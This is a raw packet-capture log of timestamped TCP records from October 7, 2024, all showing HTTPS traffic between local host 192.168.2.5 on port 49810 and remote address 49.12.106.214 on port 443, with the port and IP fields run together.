                                                                                                                                                                                        Oct 7, 2024 20:35:30.325216055 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325248003 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325529099 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325546980 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325582981 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325589895 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325632095 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.325632095 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.326008081 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.326025009 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.326086998 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.326096058 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.326133013 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.326133013 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.332276106 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.332298040 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.332350969 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.332371950 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.332433939 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.332433939 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344193935 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344223022 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344280005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344280005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344300032 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344316006 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.344427109 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.374905109 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.374929905 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.374988079 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375010014 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375025988 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375066996 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375335932 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375353098 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375422955 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375422955 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375435114 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.375919104 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.380204916 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.380233049 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.380305052 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.380305052 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.380320072 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.380423069 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.411855936 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.411884069 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.411982059 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.411982059 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412005901 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412121058 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412141085 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412143946 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412158012 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412204981 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412389040 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412484884 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412499905 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412591934 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412591934 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412599087 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.412686110 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.418771982 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.418797016 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.418886900 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.418894053 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.418936968 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.418936968 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.430996895 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.431030035 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.431148052 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.431175947 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.431251049 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461239100 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461270094 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461369991 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461385965 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461448908 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461899996 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.461921930 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.462012053 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.462012053 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.462019920 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.462117910 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.466768026 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.466799974 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.466849089 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.466857910 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.466907024 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.466907024 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498477936 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498507023 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498651028 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498651028 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498666048 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498712063 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498960018 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.498977900 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499059916 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499059916 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499067068 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499140978 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499449968 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499496937 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499547005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499553919 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499572039 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.499622107 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.505481005 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.505515099 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.505561113 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.505567074 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.505614042 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.505614042 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.517452955 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.517479897 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.517716885 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.517726898 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.517802000 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548091888 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548110008 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548549891 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548594952 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548609018 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548636913 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548649073 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548701048 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.548701048 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.553352118 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.553374052 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.553493023 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.553508997 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.553580999 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585069895 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585093975 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585388899 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585452080 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585452080 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585484028 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.585928917 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.586062908 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.586085081 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.586126089 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.586133957 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.586153984 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.587409973 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.593447924 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.593472004 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.593631029 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.593647003 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.595000029 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.605823040 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.605844975 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.605921030 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.605921030 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.605930090 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.606797934 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634707928 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634730101 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634792089 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634804964 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634862900 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634862900 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634967089 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.634984016 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.635044098 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.635051012 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.635094881 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.639890909 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.639910936 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.640091896 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.640100002 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.640201092 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.671937943 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.671962023 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672127008 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672146082 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672240973 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672261953 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672272921 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672281027 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672324896 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672713041 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672882080 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.672899008 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.673001051 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.673006058 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.673126936 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.680669069 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.680696011 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.680911064 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.680922031 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.681507111 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.725718975 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.725749016 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726402998 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726429939 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726648092 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726676941 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726716042 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726716042 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726725101 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726792097 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.726793051 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727346897 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727365971 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727428913 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727437019 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727482080 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727711916 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727735043 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727767944 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727775097 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727804899 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.727979898 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758404016 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758433104 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758920908 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758979082 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758985996 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.758985996 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759011984 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759025097 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759068012 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759588003 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759605885 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759692907 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759692907 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759699106 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.759744883 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768330097 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768358946 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768850088 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768862963 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.768990040 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812643051 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812671900 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812777996 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812866926 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812875986 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812913895 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812947989 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.812947989 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813014030 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813369989 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813385010 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813457966 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813463926 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.813627005 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814202070 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814234018 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814266920 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814277887 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.814338923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.815404892 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.845820904 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.845850945 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846059084 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846057892 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846086025 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846111059 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846153975 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846182108 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846189022 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846285105 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846407890 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846429110 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846510887 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846510887 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846518993 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.846683979 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854187012 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854216099 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854343891 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854350090 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.854707956 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899481058 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899523973 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899708986 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899708986 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899723053 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.899979115 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900003910 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900024891 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:30.900031090 CEST4434981049.12.106.214192.168.2.5
